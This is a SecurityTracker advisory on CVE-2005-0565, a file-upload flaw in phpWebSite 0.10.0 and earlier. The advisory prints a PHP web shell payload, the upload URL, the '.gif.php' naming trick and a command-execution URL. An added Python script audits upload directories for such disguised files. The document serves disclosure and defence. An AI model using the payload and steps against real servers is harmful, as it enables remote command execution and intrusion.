phpWebSite Announce Module Image Files Let Remote Users Execute Arbitrary PHP Code
|
SecurityTracker Alert ID: 1013298 |
SecurityTracker URL: http://securitytracker.com/id/1013298
|
CVE Reference:
CVE-2005-0565
|
Updated: Feb 28 2005
|
Original Entry Date: Feb 25 2005
|
Impact:
Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 0.10.0 and prior versions
|
Description:
A vulnerability was reported in the Announce module of phpWebSite. A remote user with privileges to upload image files can execute arbitrary commands on the target system.
A remote user can create a specially crafted file that appears to be formatted as a GIF file but actually contains the following type of PHP code:
<?passthru($_GET[nst]);?>
If the remote user has privileges to submit announcements, the remote user can load the following type of URL and upload the specially crafted file as the Image file, using a file name of the form "[anyname].gif.php":
http://[target]/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3
Then, the remote user can load the following URL to execute commands on the target system:
http://[target]/images/announce/[anyname].gif.php?nst=ls -la
Arbitrary PHP code and operating system commands can be executed with the privileges of the target web services.
Network security team discovered this vulnerability.
tjomka disclosed this vulnerability.
|
Impact:
A remote user can execute arbitrary PHP code and operating system commands with the privileges of the target web services.
|
Solution:
No solution was available at the time of this entry.
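An added example, not part of the original advisory or of phpWebSite's code: a Python audit of an image upload directory such as images/announce/ for files shaped like the one described above (a script extension in the name, a PHP open tag behind a GIF signature). The extension lists, function names and sample files are assumptions constructed for illustration, and the content check is a heuristic.

```python
import re
import tempfile
from pathlib import Path

IMAGE_EXTS = {"gif", "jpg", "jpeg", "png"}              # assumed allowlist for an image directory
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml"}  # assumed handler-mapped extensions
# PHP open tags, including the short form used in the advisory's sample
PHP_TAG = re.compile(rb"<\?(?:php|=|\s*[A-Za-z_$])", re.IGNORECASE)
GIF_MAGIC = (b"GIF87a", b"GIF89a")

def audit_file(path):
    """Return the reasons a file in an image upload directory is suspect."""
    reasons = []
    exts = [e.lower() for e in path.name.split(".")[1:]]
    if not exts or exts[-1] not in IMAGE_EXTS:
        reasons.append("final extension is not an image type")
    if any(e in SCRIPT_EXTS for e in exts):
        reasons.append("script extension in file name")
    data = path.read_bytes()
    if PHP_TAG.search(data):
        reasons.append("PHP open tag in file body")
    if exts and exts[-1] == "gif" and not data.startswith(GIF_MAGIC):
        reasons.append("named .gif but lacks GIF signature")
    return reasons

def audit_dir(root):
    """Map relative path -> reasons for every suspect regular file under root."""
    root = Path(root)
    findings = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            reasons = audit_file(p)
            if reasons:
                findings[p.relative_to(root).as_posix()] = reasons
    return findings

def demo():
    """Constructed sample directory: one clean GIF, one file shaped like the advisory's."""
    tmp = Path(tempfile.mkdtemp())
    clean = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
    (tmp / "logo.gif").write_bytes(clean)
    # Constructed stand-in: GIF header followed by an inert PHP tag
    (tmp / "sample.gif.php").write_bytes(b"GIF89a\x01\x00\x01\x00<?echo 'marker';?>")
    return audit_dir(tmp)

if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, "->", "; ".join(reasons))
```

The name checks flag a script extension anywhere in the file name, not only at the end, because some web server configurations map handlers by any extension component.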
|
Vendor URL: phpwebsite.appstate.edu/
|
Cause:
Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Subject: phpWebSite-0.10.0_exploit
|
------------C81D4230180A6D
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
phpWebSite-0.10.0_exploit
------------C81D4230180A6D
Content-Type: application/octet-stream; name="nst.gif.php"
Content-transfer-encoding: base64
Content-Disposition: attachment; filename="nst.gif.php"
------------C81D4230180A6D
Content-Type: text/plain; name="phpWebSite-0.10.0.EN.txt"
Content-transfer-encoding: base64
Content-Disposition: attachment; filename="phpWebSite-0.10.0.EN.txt"
------------C81D4230180A6D--
|
|